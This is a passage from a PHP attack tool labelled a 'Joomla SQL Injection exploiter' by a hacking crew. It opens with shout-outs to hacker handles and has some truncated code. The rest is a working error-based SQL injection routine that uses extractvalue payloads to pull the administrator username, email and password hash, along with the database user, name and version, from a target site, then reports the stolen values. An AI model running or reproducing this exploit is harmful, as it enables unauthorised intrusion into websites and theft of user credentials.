'; echo $head ; echo '
--==[[ Mannu ]]==--
--==[[ Joomla SQL Injection exploiter By Team INDIShEll]]==--
####################################################################################################################################
-==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, Hackuin,Alicks,mike waals
cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
--==[[Love to]]==--
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
--==[[Interface Desgined By]]==--
GCE College ke DON :D
####################################################################################################################################
'; function unhex($hex){ for($i=0;$i
--==[[ code for India ]]==--

'.$table_name; echo '
'; $prefix=explode('_',$table_name); $total_char=10; $start=1; $loop_end=false; while($loop_end!=true) { $payload2='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'.$start.','.$total_char.'),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; $final_url=$inject.$payload2; $data_extracted=data($final_url); $de0=explode("~~~", $data_extracted); $de1=explode("~~~", $de0[1]); $ddd.=trim($de1[0]); if(trim($de1[0])=='') { break; $loop_end=true; } $i=$i+1; $start=$start+10; } $username='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; $final_url=$inject.$username; $data_extracted=data($final_url); $de0=explode("~~~", $data_extracted); $de1=explode("~~~", $de0[1]); $user_name=trim($de1[0]); $email='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; $final_url=$inject.$email; $data_extracted=data($final_url); $de0=explode("~~~", $data_extracted); $de1=explode("~~~", $de0[1]); $email=trim($de1[0]); $dbuser='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1'; $final_url=$inject.$dbuser; $data_extracted=data($final_url); $de0=explode("~~~", $data_extracted); $de1=explode("~~~", $de0[1]); $db_user=trim($de1[0]); $dbname='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1'; $final_url=$inject.$dbname; $data_extracted=data($final_url); $de0=explode("~~~", $data_extracted); $de1=explode("~~~", $de0[1]); $db_name=trim($de1[0]); $dbversion='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1'; $final_url=$inject.$dbversion; $data_extracted=data($final_url); $de0=explode("~~~", $data_extracted); $de1=explode("~~~", $de0[1]); $db_version=trim($de1[0]); if($email!='' || $user_name!='' || $ddd!='') { echo 'Target '.$target.' has been injected successfully, find username, email and password given below

'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
Database username is -> '.$db_user; echo '
Database name is -> '.$db_name; echo '
Database version is -> '.$db_version; echo '
Username is -> '.$user_name; echo '
Email is -> '.$email; echo '
Password hash is -> '.$ddd; echo '
'; } } ?>